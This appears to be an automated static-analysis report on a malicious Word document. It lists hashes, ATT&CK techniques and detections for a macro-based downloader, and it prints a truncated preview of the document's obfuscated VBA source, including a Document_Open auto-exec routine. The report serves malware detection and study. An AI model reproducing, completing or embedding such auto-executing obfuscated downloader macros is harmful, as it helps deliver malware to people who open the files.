Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 e864f9735349e14c…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 186.5 KB
Created: 2018-05-21 12:00:00
Authoring application: Microsoft Office Word
First seen: 2020-02-04
MD5: be9c1ec6f5850ce6b5392152c3883667
SHA-1: 0cd779c9dab0eab81edcbbf204dddd508bf41177
SHA-256: e864f9735349e14c8c4583fe4c29b1b8eab5fca74855476f91e93349b796d818
Risk Score: 202

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1566.001 Phishing: Spearphishing Attachment
  • T1204.002 User Execution: Malicious File

The file is an Office document containing a malicious VBA macro, specifically triggered by the Document_Open event. The macro utilizes GetObject and p-code execution, indicating an attempt to download and execute a secondary payload. The ClamAV detection 'Doc.Downloader.Macro-6539595-0' further supports this assessment. No specific family could be identified, but the behavior is consistent with a macro-based downloader.

Heuristics (6)

  • ClamAV: Doc.Downloader.Macro-6539595-0 (critical, CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Downloader.Macro-6539595-0
  • VBA macros detected (medium, 3 related findings, OLE_VBA_MACROS)
    Document contains VBA macro code
  • Document_Open macro (high, OLE_VBA_DOCOPEN)
    Macro attached to the Document_Open auto-execution event
  • GetObject call (high, OLE_VBA_GETOBJ)
    Macro calls GetObject
  • VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL (info, EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://ns.adobe.com/xap/1.0/ — in document text (OLE body)
    • http://www.w3.org/1999/02/22-rdf-syntax-ns# — in document text (OLE body)
    • http://ns.adobe.com/xap/1.0/mm/ — in document text (OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceRef# — in document text (OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 49464 bytes
SHA-256: b5269f6485dab88adb314479c288f0770dfa00883f5fa1a521f91f9260239f3d

Preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub RemovePageNumbersFromCurrentSection()
    Dim ThisHeader As HeaderFooter
    Dim ThisPageNumber As PageNumber
    With Selection.Sections(1)
        For Each ThisHeader In .Headers
            For Each ThisPageNumber In ThisHeader.PageNumbers
                ThisPageNumber.Delete
            Next ThisPageNumber
        Next ThisHeader
    End With
End Sub

Private Sub Document_Open()
Dim raveup As Long
Dim catalo As Integer
autoradiographic = "pensee"
inexhaustible = magsman
lazarillo
catostomus = 52 + 9
 Pmt 0, catostomus, 26008, 58110, 6
End Sub
Function assert(pathetically)
Dim bloated As String
Dim baddeleyite As Integer
Dim center As Variant
Dim spinster As Byte
#If (36 - 10 + 374 + 105 - 115 + 310) > ((23 - 14 + 311) - (49 - 58 + 549) * 1) And ((105 - 83 + 6) - (47 - 88 + 69)) * 2 < (Win64) Then
Dim constructive As Variant
Dim ceratosaur As LongPtr
mainframe = 59 - 28 - 23
Dim conventionalism As LongPtr
Dim babar As Long
Dim assail As Integer
Dim dafe As LongPtr
Dim leiopelma As Byte
audita = VarPtr(ceratosaur)
fascicule = currunt(audita, VarPtr(pathetically) + (63 - 20 - 35), mainframe)
#ElseIf (34 - 97 + 463 + 58 - 116 + 358) > ((82 - 67 + 305) - (33 - 83 + 590) * 1) And Not ((88 - 34 - 26) - (22 - 49 + 55)) * 2 < (Win64) Then
Dim ceratosaur As Long
mainframe = 37 - 80 + 47
Dim conventionalism As Long
Dim dafe As Long
audita = VarPtr(ceratosaur)
fascicule = eschscholtzia(audita, VarPtr(pathetically) + (71 - 84 + 21), mainframe)
#End If
savory = 69 - 104 + 34
conventionalism = 25 - 106 + 81
uncertified = 20 - 82 + 62
dafe = 106 - 69 + 9720
giovane = 22 - 92 + 4166
remiform = 39 - 114 + 139
emphysema = underpants(ByVal savory, _
conventionalism, ByVal uncertified, dafe, ByVal giovane, _
ByVal remiform)
pontifical = Fix(246)

demonolatry = bibliographic

#If (48 - 17 + 369 + 98 - 92 + 294) > ((17 - 4 + 307) - (2 - 65 + 603) * 1) And ((98 - 111 + 41) - (83 - 96 + 41)) * 2 < (Win64) Then
restitution = currunt(conventionalism, ceratosaur, 90 - 117 + 5910)
#ElseIf (86 - 119 + 433 + 107 - 76 + 269) > ((111 - 104 + 313) - (83 - 49 + 506) * 1) And Not ((9 - 3 + 22) - (10 - 46 + 64)) * 2 < (Win64) Then
disomatous = eschscholtzia(conventionalism, ceratosaur, 126 - 112 + 5869)
#End If
aloofness = 52 + 44
 Pmt 0, aloofness, 34624, 32256, 5

assert = conventionalism
End Function
Sub lazarillo()
Dim balmy As Integer
Dim airspace As Integer
cacogenesis.bairdiella.Value = Day(#12/5/2013#)
varday = communicational = "colutea"
circulating = "produce"
mated = "avellan"
chaucer = pastry
hoecake = conjecturality

unagitated = "interoceptive"
analecta = "yangtze"
Set bout = cacogenesis.bairdiella.SelectedItem
because = 53 + 46
 Pmt 0, because, 21129, 29989, 6

frankness = bout.Name
doubleshotted = 94 - 10 + 7760
epacridaceae = Right(frankness, doubleshotted)
bestow = bosniaherzegovina.processed(epacridaceae)
plangent = 60 + 10
 Pmt 0, plangent, 11771, 19776, 2

ameliorate = "caraffe"
#If (60 - 102 + 442 + 28 - 102 + 374) > ((125 - 58 + 253) - (122 - 34 + 452) * 1) And ((2 - 17 + 43) - (58 - 16 - 14)) * 2 < (Win64) Then
Dim arrastra As Variant
Dim conclude As LongPtr
Dim aphrodite As LongPtr
Dim archine As Variant
#ElseIf (107 - 13 + 306 + 3 - 121 + 418) > ((19 - 23 + 324) - (63 - 106 + 583) * 1) And Not ((105 - 49 - 28) - (83 - 48 - 7)) * 2 < (Win64) Then
Dim netscape As Variant
Dim aphrodite As Long
Dim lift As Byte
Dim conclude As Long
#End If
thraupidae = 94 - 70 - 24
caryophyllidae = "multidimensional"
challis = 128 - 105 + 4073
goth = 8 + 16
 Pmt 0, goth, 9442, 33585, 7

forbears = "bhadon"
stirringly = "attain"
pulsation = "circuitously"
devoured = 21 + 60
 Pmt 0, devoured, 25229, 13385, 2

outpouring = bestow
cucurbitaceae = beasts
... (truncated)